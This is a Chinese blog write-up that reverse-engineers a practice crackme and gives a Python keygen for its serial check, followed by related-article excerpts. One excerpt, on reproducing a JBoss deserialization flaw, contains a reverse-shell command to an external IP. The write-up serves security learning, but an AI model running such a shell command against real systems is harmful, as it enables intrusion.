新160个crackme - 063-dc0de-crackme

news2024/12/25 23:51:33

运行分析

在这里插入图片描述

  • 需要破解Username和Serial

PE分析

在这里插入图片描述

  • Delphi程序,32位,无壳

静态分析&动态调试

在这里插入图片描述

  • ida搜索到关键字符串,双击进入函数

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

  • 进行动态调制函数较长,共有5个循环,以循环为单位逐步分析,注释如上
  • 循环1:将str1每个字符值+1,赋值给str2,其实就是strcpy函数
  • 循环2:将str1每个字符值+1,赋值给str3,同上
  • 循环3:将Username赋值给str3[54]之后的值
  • 循环4:提取str3每一位进行判断,改变Username的值,此循环为关键计算步骤,也是最难点,跟着一步一步写出算法
  • 循环5:提取改变后的Username每一位字符,累加计算得到a3

在这里插入图片描述

在这里插入图片描述

  • 查看全局变量,str1 = str_______________________= ";;;;;;;;;;;;;,=,====*===**==**===* "
  • 查看a3计算前的值为0x19F50C

算法分析

Username = 'conceal'
Username_list = [ord(i)for i in Username]

# 得到str3
str1 = ';;;;;;;;;;;;;**====,,=,,========*=**=*=**=*=**=*=*=* '
str2 = []
for i in str1:
    str2.append(ord(i) + 1)
str3 = str2
str3.append(0)
str3.extend(Username_list)
str3.extend([0]*(1000-len(str3)))

# 计算得到str3的Username部分
v17 = 0
v16 = 1
str1_length_plus_2 = 0x37
while ( v17 != 1 ):
  v18 = str3[v16 - 1];
  if ( v18 > 0x3C ):
    v21 = v18 - 0x3E;
    if ( v21 ):
      v22 = v21 - 0x1D;
      if ( v22 ):
        if ( v22 == 2 and str3[str1_length_plus_2 - 1] ):
            v16 -= 1
            while ( str3[v16 - 1] != 91 ):
                v16 -= 1
      elif ( str3[str1_length_plus_2 - 1] == 0 ):
        v16 += 1;
        while ( str3[v16 - 1] != 93 ):
            v16 += 1;
    else:
        str1_length_plus_2 += 1;
  elif ( v18 == 0x3C ):
    str1_length_plus_2 -= 1;
  else:
    v19 = v18 - 0x21;
    if ( v19 ):
      v20 = v19 - 10;
      if ( v20 ):
        if ( v20 == 2 ):
            str3[str1_length_plus_2 - 1] -= 1;
      else:
        str3[str1_length_plus_2 - 1] += 1;
    else:
      v17 = 1;
  v16 += 1
Username_calc = str3[0x36:0x36+len(Username)]

# 计算得到Serial
Serial = 0x19F50C
for i in Username_calc:
    Serial += i

print(Username + '的Serial为:\n' + str(Serial))

在这里插入图片描述

在这里插入图片描述

  • 验证成功

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2158433.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

vue中高德地图使用 Marker 标点 - 标点数据快到 1000 时页面卡顿问题解决(已解决 - 多方面原因)+ 海量点功能实现解决

目录 1.业务需求2.最初实现及出现的问题3.解决 - 1000 个标点时页面就出现 卡顿 问题4.使用海量点、聚合标点后还有卡顿,排查其他原因5.最终解决5.1页面中list数据渲染问题解决5.2地图相关实例不要放在 vue 的可响应数据中 页面展示 1.业务需求 需要在 高德地图 中标…

【Unity图书】Unity 2018入门与实战

推荐一本适合初学者的书《Unity 2018 入门与实战》 京东购买链接:现在购买 推荐本书的两大理由: 一是浅显易懂,容易操作,讲解有趣 二是条理性的编程思想,从小例子开始培养项目管理的习惯 在动手之前先按下面的步骤…

docker镜像的打包、复制、加载

一、镜像打包 docker save -o /root/ollama.tar ollama/ollama 二、复制 如果网络互通,则可以直接远程复制即可。如果网络不通,则可以先下载到本地再上传到目标主机。这里我直接远程复制: 将本机的ollama.tar文件复制到目标主机192.168.1.2…

防火墙详解(一) 网络防火墙简介

原文链接:https://blog.csdn.net/qq_46254436/article/details/105519624 文章目录 定义 与路由器和交换机的区别 发展历史 防火墙安全区域 定义 防火墙主要用于保护一个网络区域免受来自另一个网络区域的网络攻击和网络入侵行为 “防火墙”一词起源于建筑领域&…

ARM单片机的详细启动流程(重要)

ARM单片机的详细启动流程 一、ARM架构 ARM Cortex_M3内核中提供了多个复位信号,厂商设计MCU时一般只使用以下三个复位信号,其他复位信号在MCU内部实现(如看门狗复位信号、软件复位:软件服务只能复位内核,内核以外不受…

(附源码)基于django的电力工程作业现场物资管理系统的设计与实现-计算机毕设 22067

基于django的电力工程作业现场物资管理系统的设计与实现 摘 要 随着电力工程的快速发展,作业现场物资管理成为保障工程进度和质量的关键环节。本文旨在设计并实现一个基于Django框架的电力工程作业现场物资管理系统,以提高物资管理的效率和准确性。该系统…

移情别恋c++ ദ്ദി˶ー̀֊ー́ ) ——14.AVL树

1.AVL 树 1.1AVL 树的概念 二叉搜索树虽可以缩短查找的效率,但如果数据有序或接近有序二叉搜索树将退化为单支树,查 找元素相当于在顺序表中搜索元素,效率低下。因此,两位俄罗斯的数学家G.M.Adelson-Velskii 和E.M.Landis在1962…

Redis事务总结

1.事务介绍 Redis 事务是一个用于将多个命令打包在一起执行的功能,它可以确保这些命令按照顺序执行,并且具有原子性。这意味着事务中的命令要么全部执行,要么全部不执行,这有助于保持数据的一致性。 Redis 事务本质:…

小程序开发设计-协同工作和发布:协同工作⑧

上一篇文章导航: 小程序开发设计-小程序的宿主环境:组件⑦-CSDN博客https://blog.csdn.net/qq_60872637/article/details/142455350?spm1001.2014.3001.5501 注:不同版本选项有所不同,并无大碍。 目录 上一篇文章导航&#x…

Matlab/simulink低版本打开高版本

很简单,取消”预设“下一个选项的勾即可, 我是21a,打开21b的simulink亲测有效,以下是过程记录

校园社区服务系统小程序的设计

管理员账户功能包括:系统首页,个人中心,用户管理,发布类型管理,互帮互助管理,物品分类管理,闲置交易管理,购买物品管理,反馈信息系统管理 微信端账号功能包括&#xff1…

lammps计算区域压力的两种方法

大家好,我是小马老师。 本文介绍lammps计算区域压力的两种方法。 在lammps模拟中,计算某一个固定区域内气体或者液态的压力,可以先计算该区域内所有单个原子的应力,然后把区域内原子的应力值求和再除以体积。 只有处于该区域内的原子参与压力的计算,当原子移动出该区域后,…

如何合并pdf文件,四款软件,三步搞定!

在数字化办公的浪潮中,PDF文档因其跨平台兼容性和安全性,成为了我们日常工作中不可或缺的一部分。然而,面对多个PDF文件需要整合成一个文件时,不少小伙伴可能会感到头疼。别担心,今天我们就来揭秘四款高效PDF合并软件&…

JBOSS中间件漏洞复现

CVE-2015-7501 1.开启环境 cd vulhub/jboss/JMXInvokerServlet-deserialization docker-compose up -d docker ps 2.访问靶场 3.访问/invoker/JMXInvokerServlet目录 4.将反弹shell进⾏base64编码 bash -i >& /dev/tcp/47.121.191.208/6666 0>&1 YmFzaCAt…

Linux C# Day4

作业: 1.统计家目录下.c文件的个数 #!/bin/bash num0 for filename in ls ~/*.c do((num)) done echo $num2.定义一个稀疏数组(下标不连续),写一个函数,求该稀疏数组的和,要求稀疏数组中的数值通过参数传递到函数中arr([2]9 [4…

基于单片机的自行车智能辅助系统设计

文章目录 前言资料获取设计介绍功能介绍设计程序具体实现截图目 录设计获取 前言 💗博主介绍:✌全网粉丝10W,CSDN特邀作者、博客专家、CSDN新星计划导师,一名热衷于单片机技术探索与分享的博主、专注于 精通51/STM32/MSP430/AVR等单片机设计 …

多数元素-简单

169. 多数元素 - 力扣(LeetCode) 【LeetCode 每日一题】169. 多数元素 | 手写图解版思路 代码讲解_哔哩哔哩_bilibili c为计数器,代表当前候选人的票数 v为当前候选人 x为遍历的各候选人得票 分三种情况: 第一种,c…

OpenBayes 一周速览|IC-Light 图片打光神器一键启动!Tecnalia 电子设备废物高光谱数据集上线,提高电子废物回收准确性

公共资源速递 This Weekly Snapshots ! 5 个数据集: * BTAD 工业异常数据集 * WebVid 大型短视频数据集 * bAbi 问答和文本理解的数据集 * OpenMIR 音乐收听脑电图数据集 * Tecnalia 电子设备废物高光谱数据集 2 个教程: * ComfyUl …

12. Inseq 特征归因:可视化解释 LLM 的输出

Feature Attribution(特征归因):你可以将其当做对模型输出的解释,就像在图像分类中可视化模型关注的区域一样。 本文将介绍 Inseq,这是一个用于解释和可视化序列生成模型输出的工具。我们将通过翻译任务(关…

Flink 本地启动的多种方式

Flink 本地启动的多种方式 Application模式通过代码提交到Yarn上启动 //设置Yarn客户端 YarnClient yarnClient ; Configuration configuration new Configuration(); if (customConfiguration ! null) {configuration.addAll(customConfiguration); } configuration.set(Jo…